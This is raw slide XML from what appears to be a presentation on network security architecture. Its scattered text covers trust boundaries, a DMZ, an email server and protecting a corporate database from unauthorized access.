                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-50" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> have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 the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original</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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TB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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in which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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everything </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>completely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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trustworthy</a:t>
            </a:r>
            <a:endParaRPr sz="1999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3233" y="2819304"/>
            <a:ext cx="4717456" cy="1245546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="55" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	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And a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second one that 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includes the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email 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server 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and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possible some other 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things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that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>are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secured, 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but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not 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as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>trustworthy 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as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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needed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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Boundary</a:t>
            </a:r>
            <a:endParaRPr sz="1999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83233" y="4343289"/>
            <a:ext cx="4577793" cy="636104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  <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="55" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	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Sometimes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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called 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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Demilitarized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Zone</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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or</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298995" defTabSz="914126"/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DMZ</a:t>
            </a:r>
            <a:endParaRPr sz="1999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367087" y="3158610"/>
            <a:ext cx="179536" cy="54849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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pP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re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all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836279" y="1979926"/>
            <a:ext cx="857027" cy="2870722"/>
            <a:chOff x="6838060" y="1979548"/>
            <a:chExt cx="857250" cy="2871470"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6852665" y="1994153"/>
              <a:ext cx="828040" cy="2842260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="828040" h="2842260">
                  <a:moveTo>
                    <a:pt x="0" y="137922"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7028" y="94317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26602" y="56455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56455" y="26602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94317" y="7028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137922" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689610" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733214" y="7028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771076" y="26602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800929" y="56455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820503" y="94317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827532" y="137922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827532" y="2704338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820503" y="2747942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800929" y="2785804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771076" y="2815657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733214" y="2835231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689610" y="2842260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137922" y="2842260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94317" y="2835231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56455" y="2815657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26602" y="2785804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7028" y="2747942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2704338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="137922"/>
                  </a:lnTo>
                  <a:close/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6870953" y="3367277"/>
              <a:ext cx="386715" cy="1905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="386715" h="1904">
                  <a:moveTo>
                    <a:pt x="386206" y="1777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6925817" y="2193797"/>
              <a:ext cx="681355" cy="520065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="681354" h="520064">
                  <a:moveTo>
                    <a:pt x="0" y="86613"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6800" y="52881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25352" y="25352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52881" y="6800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594614" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628346" y="6800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655875" y="25352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674427" y="52881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681228" y="86613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681228" y="433069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674427" y="466802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655875" y="494331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628346" y="512883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594614" y="519683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="519683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52881" y="512883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25352" y="494331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6800" y="466802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="433069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="86613"/>
                  </a:lnTo>
                  <a:close/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027873" y="2225733"/>
            <a:ext cx="473586" cy="396801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marR="5078" indent="31740" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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Email </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-3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200" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>v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842501" y="1707328"/>
            <a:ext cx="970662" cy="3471275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="970915" h="3472179">
                <a:moveTo>
                  <a:pt x="0" y="161798"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5776" y="118768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22079" y="80113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47370" y="47371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80113" y="22079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118768" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161798" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="808990" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852019" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="890674" y="22079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923416" y="47371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948708" y="80113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965011" y="118768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970788" y="161798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970788" y="3309874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965011" y="3352903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948708" y="3391558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923416" y="3424301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="890674" y="3449592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852019" y="3465895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="808990" y="3471672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161798" y="3471672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118768" y="3465895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80113" y="3449592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47370" y="3424301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22079" y="3391558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="3352903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3309874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161798"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12192">
            <a:solidFill>
              <a:srgbClr val="006FC0"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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046664" y="2713669"/>
            <a:ext cx="1903868" cy="2652974"/>
            <a:chOff x="7048500" y="2713482"/>
            <a:chExt cx="1904364" cy="2653665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062977" y="2713482"/>
              <a:ext cx="0" cy="1901189"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="1901189">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1900936"/>
                  </a:lnTo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8452866" y="5058917"/>
              <a:ext cx="499745" cy="307975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="81857" y="32325"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484758" y="307974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499744" y="283082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52069" y="81914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54609" y="49656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86322" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96773" y="7492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="69468" y="24891"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54609" y="49656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24891"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="86322" y="24891"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86322" y="24891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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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942012" y="1914209"/>
            <a:ext cx="5257800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Prevent unauthorized individuals from obtaining access to the resources on the network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371600" lvl="4" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The corporate database holds data on the organization, operations, and the strategic plan.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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Measures Are in Place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3" y="1676399"/>
            <a:ext cx="4962021" cy="466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5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4701399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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25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699" y="1332267"/>
            <a:ext cx="9511093" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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uncommon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have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many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Boundaries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defining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different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18531" y="1696662"/>
            <a:ext cx="3372242" cy="4407022"/>
            <a:chOff x="6620256" y="1696211"/>
            <a:chExt cx="3373120" cy="44081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4775" y="3723107"/>
              <a:ext cx="1491139" cy="233972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69504" y="6085853"/>
              <a:ext cx="1285875" cy="18415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285875" h="18414">
                  <a:moveTo>
                    <a:pt x="1285653" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60527" y="18179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196069" y="18179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285653" y="0"/>
                  </a:lnTo>
                  <a:close/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6626352" y="1702307"/>
              <a:ext cx="3360420" cy="1974850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3360420" h="1974850">
                  <a:moveTo>
                    <a:pt x="0" y="233425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4742" y="186386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18345" y="142571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39868" y="102920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68373" y="68373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102920" y="39868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142571" y="18345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186386" y="4742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233426" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960245" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2800350" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3126994" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3174033" y="4742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217848" y="18345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3257499" y="39868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292046" y="68373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320551" y="102920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3342074" y="142571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355677" y="186386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360420" y="233425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360420" y="816991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360420" y="1167130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355677" y="1214169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3342074" y="1257984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320551" y="1297635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292046" y="1332182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3257499" y="1360687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217848" y="1382210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3174033" y="1395813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3126994" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2800350" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561336" y="1974342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960245" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233426" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186386" y="1395813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142571" y="1382210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102920" y="1360687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68373" y="1332182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39868" y="1297635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18345" y="1257984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4742" y="1214169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1167130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="816991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="233425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820028" y="1921649"/>
            <a:ext cx="2969756" cy="665942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" marR="5078" algn="ctr" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Dumpty said </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rather </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scornful </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tone, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>means just what </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>choose </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>mean </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>neither</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>less."</a:t>
            </a:r>
            <a:endParaRPr sz="14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30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19546" y="1661365"/>
            <a:ext cx="5422757" cy="122269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381521" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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needs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around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large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system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298995" marR="1008712" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1744"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="55" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	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The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>level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of trustworthiness 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is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what </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
